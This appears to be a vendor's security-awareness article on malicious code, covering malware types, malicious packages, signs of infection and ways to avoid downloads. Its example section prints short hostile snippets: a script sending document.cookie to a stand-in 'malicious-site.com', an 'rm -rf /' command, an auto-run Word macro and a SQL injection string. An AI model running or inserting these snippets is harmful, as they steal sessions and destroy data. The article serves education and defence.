How To Avoid Downloading Malicious Code: Malware Warning!

logo
Featured On

EntrepreneurForbesBuisiness InsiderAxios

What is malicious code?

Malicious code refers to specific lines or segments of code within a program or script that are designed to carry out malicious actions e.g. cause harm, exploit vulnerabilities, or compromise the security and functionality of a computer system, network, or device without the knowledge or consent of the user. Malicious code can take various forms and can have a wide range of malicious intent.

Malicious code can exist as part of a larger software program, a script, a macro within a document, or as standalone code. When embedded into a larger software program, this becomes known as ‘malware’. There are many many types of malware - these are some of the most common types:

  • Viruses: Viruses are self-replicating programs that attach themselves to legitimate executable files or documents. When these infected files are executed, the virus spreads to other files and can damage or corrupt data, steal information, or perform other harmful actions.
  • Worms: Worms are self-replicating programs that can spread across networks or the internet independently, without the need for user intervention. They often exploit vulnerabilities in software or operating systems to infect other computers.
  • Trojans (Trojan Horses): Trojans are deceptive programs that masquerade as legitimate software or files. When a user downloads and executes a Trojan, it typically performs malicious actions, such as stealing sensitive information, creating backdoors for hackers, or damaging the system.
  • Ransomware: Ransomware is a type of malware that encrypts a user's files or an entire system, rendering them inaccessible. The attacker then demands a ransom from the victim to provide the decryption key. Paying the ransom is not guaranteed to result in the recovery of files, and it can encourage further criminal activity.
  • Spyware: Spyware is designed to secretly gather information about a user's online activities, such as browsing habits, keystrokes, and login credentials. This stolen data is often used for malicious purposes, such as identity theft or fraud.
  • Adware: Adware displays unwanted advertisements to users, often in an intrusive manner. While not as harmful as other types of malware, adware can negatively impact user experience and privacy.
  • Botnets: Botnets are networks of compromised computers or devices (known as bots) that are controlled by a central server (the botmaster). These bots can be used for various malicious purposes, including distributed denial-of-service (DDoS) attacks, sending spam emails, or performing other cyberattacks.
  • Rootkits: Rootkits are malicious programs designed to gain unauthorized, deep-level access (root or administrator privileges) to a computer or device. They can hide themselves and other malware, making it difficult to detect and remove them.
  • Keyloggers: Keyloggers record a user's keystrokes without their knowledge, allowing attackers to capture sensitive information like login credentials, credit card numbers, or personal messages.
  • Backdoors: Backdoors are hidden entry points or vulnerabilities in a system that can provide unauthorized access to attackers. Malicious actors can use backdoors to gain control over compromised systems.

Malicious code is a significant cybersecurity threat, and its impact can range from minor annoyances to severe data breaches, financial losses, and even the compromise of critical infrastructure.

What is an example of malicious code?

Code from trusted and reputable sources, such as well-known software developers or official websites, is more likely to be safe - but users must be cautious when downloading code from unfamiliar or suspicious sources.

A string of malicious code can take many forms, and its appearance varies depending on the programming language used and the specific purpose of the code. Malicious code is typically designed to exploit vulnerabilities, compromise security, or perform harmful actions on a computer system. Here are some examples of what a string of malicious code might look like in various programming languages:

JavaScript (for web-based attacks):

<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "https://malicious-site.com/steal-data.php?data=" + document.cookie, true);
  xhr.send();
</script>

This JavaScript code makes an HTTP request to a malicious site, sending the victim's cookies as part of the request.

Python (for malware):

import os

def encrypt_files_in_directory(directory):
    for root, dirs, files in os.walk(directory):
        for file in files:
            file_path = os.path.join(root, file)
            # Malicious code to encrypt files

encrypt_files_in_directory('/home/user/documents')

This Python code is an example of ransomware, as it encrypts files in a specified directory.

C (for exploiting vulnerabilities):

#include <stdio.h>

int main() {
    char vulnerableBuffer[100];
    gets(vulnerableBuffer);  // Vulnerable function that can lead to buffer overflow
    return 0;
}

This C code snippet demonstrates a vulnerable program that can be exploited through a buffer overflow attack.

SQL Injection (for database attacks):

SELECT * FROM users WHERE username = 'admin' OR '1'='1';

This SQL code illustrates a simple SQL injection attempt, where an attacker tries to retrieve all user records by manipulating the query.

Shell script (for malicious automation):

#!/bin/bash
rm -rf /

This shell script contains a dangerous command that recursively deletes all files and directories in the system.

Macro (for malicious document attachments):

Sub AutoOpen()
    Dim objShell As Object
    Set objShell = CreateObject("WScript.Shell")
    objShell.Run "cmd.exe /c malicious.bat"
End Sub

This VBA macro code, when embedded in a Word document, runs a malicious batch script when the document is opened.

It's important to note that malicious code is typically designed to be obfuscated or hidden within legitimate-looking code to evade detection. Security professionals and researchers use various tools and techniques to analyze and detect such code, often looking for patterns, known malware signatures, or behavior that deviates from expected norms.

What is not a type of malicious code?

Not all code is malicious; in fact, the majority of code is designed for legitimate and productive purposes. Some types of code that are typically not considered malicious include:

  • Productive code: The vast majority of software and code is created for productive purposes, such as applications, websites, tools, and utilities that help users perform tasks, solve problems, or enhance their digital experiences.
  • Open source code: Many developers contribute to open source projects by sharing their code with the community. Open source code is typically developed transparently and collaboratively, and it is subject to peer review, making it less likely to contain malicious elements.
  • System code: The operating system, device drivers, and system software running on computers and devices are essential for their proper functioning. While vulnerabilities may exist, these components are not inherently malicious.
  • Code libraries and frameworks: Developers often use code libraries and frameworks to build applications more efficiently. These libraries are typically created and maintained by trusted sources and are not malicious by nature.
  • Utilities and tools: Code that provides utilities, diagnostic tools, or system maintenance functions, like antivirus software or backup utilities, is intended to protect or enhance a system's performance, not harm it.
  • Scripting for automation: Scripting languages like Python, PowerShell, and Bash are often used for automating routine tasks and processes. These scripts are not inherently malicious but can be used for both legitimate and malicious purposes.
  • Educational code: Code used for educational purposes, such as coding tutorials, programming exercises, or classroom assignments, is created to teach and learn, not to harm.
  • Code for research and development: Researchers and developers write code for experimentation, data analysis, and the advancement of scientific or technological knowledge.
  • Prototyping and proof-of-concept code: Code used for prototyping new ideas, concepts, or features is typically not malicious. It serves as a testing ground to explore possibilities.
  • Code for creative purposes: Artists and creative professionals use code for digital art, interactive installations, and other creative expressions. This code is not meant to be malicious but rather to convey artistic or creative concepts.

Malicious code deployed by 3rd-parties

Malicious code can also be deployed by third-party code packages. This has become a more popular practice as threat actors seek to find new attack vectors. By injecting malicious code into legitimate code packages, this attack vector leverages trusted 3rd-party repositories, as the packages are then distributed through online code repositories and package managers.

Types of malicious software packages may include:

  • A Windows .exe application installation file that installs malware onto a system along with the legitimate application that the user is trying to install
  • A .deb or .rpm file that is installed onto a Linux system, which includes a compromised version of a server application
  • A vulnerable version of a Python framework that is installed into a development environment while installing the actual Python package.
  • Malicious dependencies that have been included in a Docker container image.

Detecting malicious packages

It can be tricky to detect malicious packages. As packages are hosted in some type of repository, where developers and users can search for and download them, the public package repositories don’t usually require security checks or validations before accepting them -rather, anyone can create repositories and upload packages to them, which means that unsuspecting users may download those packages without realizing they contain malicious code.

Similarly, just as package repositories don’t automatically block malicious packages, most package installers don’t try to detect malware before installing a package either. Therefore, just because the software package installs without issue or any warnings from your package manager, it doesn’t mean that the package is free from malicious code.

Even more worrying are the sophisticated attackers who use attack techniques like DNS spoofing to trick victims into installing malicious packages. DNS spoofing attacks can allow the attackers to redirect network traffic to servers of their choosing, despite the servers’ URLs appearing to be legitimate. Attackers can then utilize this vulnerability to steal confidential information.

Malicious code cyber awareness: How can you avoid malicious code?

Although detecting malicious computer code can be challenging, as attackers often employ sophisticated techniques to disguise their code and intentions, there are some tell-tale signs that your device has been infected with malicious code:

  • Unexpected system behavior: Unusual system crashes or freezes, slowdowns in computer performance, even during basic tasks, or unexplained changes in system settings or configurations could be a sign that malicious code has infiltrated the device.
  • Pop-up ads and redirects: Frequent and intrusive pop-up ads while browsing the internet, and redirects to unfamiliar or suspicious websites, especially when using web browsers, could indicate adware
  • Unwanted programs or toolbars: Watch out for the presence of unfamiliar or unwanted software, toolbars, browser extensions that you didn't install, or changes to your default search engine or homepage without your consent.
  • Security software alerts: Pay attention to warnings or alerts from your antivirus or anti-malware software about detected threats, and notifications of suspicious or blocked activities, such as attempted network connections or file modifications.
  • Unexplained network traffic: Unusual and unexplained network activity or spikes in data usage can indicate the presence of malware. Outbound connections to known malicious IP addresses or domains are also suspicious.
  • Unsolicited download requests: Be cautious about downloading files from unknown sources - unexpected prompts to download files or software from unfamiliar websites or email attachments could be a sign of malware present.
  • Unfamiliar processes or services: If there are unrecognized processes or services running in the background of your system, you should review your system's task manager or process monitor for any unusual activity.
  • Phishing attempts: Phishing emails often contain malicious code or links designed to steal your information. Be cautious of unsolicited emails asking for personal or financial details.
  • Unusual firewall alerts: Pay attention to alerts from your firewall about incoming or outgoing connections from unrecognized applications or processes. Browser warning messages: Modern web browsers may display warnings when visiting potentially harmful websites or downloading suspicious files. Take these warnings seriously.

If you notice any of these signs or suspect that your computer may be infected with malware, it's essential to take immediate action. Isolate the affected device from your network, run a reputable antivirus or anti-malware scan, and follow the recommended steps to remove the detected threats.

How can you avoid downloading malicious code?

To avoid downloading malicious code, you should first examine what permissions or access the code requests. Malicious code often seeks unnecessary access to sensitive data or system resources. If a piece of code asks for excessive permissions, it may be a red flag that this is malicious code. Some software and code may include digital signatures or certificates that verify their authenticity. You should check for these digital signatures and verify their validity.

When downloading code, consider using official software repositories or package managers like npm (for JavaScript), PyPI (for Python), or RubyGems (for Ruby). These repositories often vet code for security and reliability.

Additionally, developers and users must take steps to minimize the risk of installing malicious packages into the environments or systems they use. One of the most important ways to protect against malicious packages is to scan packages of all types before installing them – including application installers and container images. Scanning tools can’t detect all types of malware and vulnerabilities, but they can alert you to many common risks.

It’s also important to only download from trusted sources - however, don’t assume that because a repository is on a mainstream site, like GitHub or Docker Hub, it can be trusted! As mentioned above, anyone can set up repositories on these services, so you need to make sure you trust the specific repository maintainers.

Another step you can take is to verify the package checksums. A package checksum, often referred to as a hash or checksum value, is a cryptographic hash function generated from the contents of a file. It serves as a unique fingerprint or digital signature for a file, allowing users to verify the integrity of the file and detect any potential corruption or tampering. When you download a file, especially software or updates, compare the calculated checksum with the one provided by the package provider. If they match, the file is likely intact and has not been corrupted or tampered with during download. If the checksums do not match, it indicates that the file may be corrupted or compromised. In such cases, do not use the file, and consider re-downloading it from a trusted source.

Malicious code protection: Which is a best practice that can prevent viruses and other malicious code from infiltrating my device?

Determining whether a piece of code, or software package, is malicious or not can be challenging, but there are some key factors and best practices you can use to help identify non-malicious code:

  • Code review: If you have the knowledge and experience, review the code yourself or have it reviewed by someone you trust who is knowledgeable in programming. Look for any suspicious or unexpected behavior in the code.
  • Update frequency: Check how frequently the code is updated and maintained. Regular updates and a responsive development team are signs of a healthy and safe codebase.
  • Open source: Open-source code that is widely used and actively maintained by a community of developers tends to be more trustworthy because it undergoes peer review.
  • Scan for malware: Consider using antivirus or anti-malware software to scan the code for known threats or malicious patterns. An antivirus program such as RAV Endpoint Protection can scan code files for potential issues.
  • Documentation and transparency: Legitimate code is often well-documented, providing clear instructions and explanations of its functionality. Read through the documentation to understand how the code is intended to work.
  • Code sandboxing: If you're testing or running unfamiliar code, consider using a controlled environment or sandbox to limit its access to your system resources and data. Use security tools: Utilize security tools and practices such as intrusion detection systems (IDS), intrusion prevention systems (IPS), and firewall rules to monitor and control code execution.
  • Basic digital hygiene: Regularly updating your operating system and software, using strong and unique passwords, and practicing safe internet browsing habits can also help prevent malware infections in the first place.

It's important to exercise caution when dealing with code from untrusted or unverified sources, especially if the code has the potential to interact with sensitive data or system resources. When in doubt, seek guidance from experts or security professionals who can help assess the safety and integrity of the code in question, or reputable security software to determine its nature and potential risks.

For more information on full end-to-end cybersecurity protection, visit reasonlabs.com.